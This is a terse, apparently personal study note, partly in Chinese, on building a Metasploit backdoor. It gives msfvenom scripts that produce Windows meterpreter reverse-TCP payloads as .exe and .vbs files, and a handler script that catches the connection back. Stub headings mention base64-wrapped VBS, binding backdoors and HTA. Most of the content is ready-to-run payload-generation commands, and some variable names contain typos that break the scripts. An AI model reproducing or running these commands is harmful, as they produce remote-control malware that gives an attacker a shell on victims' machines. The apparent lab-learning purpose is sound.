# Config metaspolit backdoor ## msfconsole (server) ### Set handler (modudle  use directory ### set options   ### set payloads  ## Yield backdoor ### msfvenom  - -p (payloads - <b>OS /control way/ moduleName</b> - -a (architecture - -- platform (OS - -f (form - check fileTypes  - o (output - Beacuse it's a reverse connect, we need to set local host LHOST = LPORT = ## Listen the target   - session layer - permission - at ## bashscript ### Yield backdoor script - 太屌了 跟鬼一樣XD ```bash= #set up parameter ip=10.0.2.15 port=4444 a=x86 platform=windows f=exe output=../../x86ReversTCP.exe payloads=windows/meterpreter/reverse_tcp # execute commend msfvenom -p $payloads -a $a --platform $playform -f $f LHOST=$ip LPORT=$port -o $output ``` ### Execute BashScript  ### modudleScript ```.rc use exploit/multi/handler set payloads windows/meterpreter_reverse_tcp set LHOST 10.0.2.15 set LPORT 4444 exploit ``` #### Execute   --- ## VBS - visual basic script - Could execute .exe file in VBS'file. - 原碼型腳本 #### BashScript ```bash= ip=10.0.2.15 port=4444 a=x86 platform=windows f=vbs output=x86ReversTCP.vbs payloads=windows/meterpreter/reverse_tcp msfvenom -p $payloads -a $a --platform $playform -f $f LHOST=$ip LPORT=$port -o $output ```  create object -> html document load xml -> base64 --- ## Binds a backdoor ## HTA
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up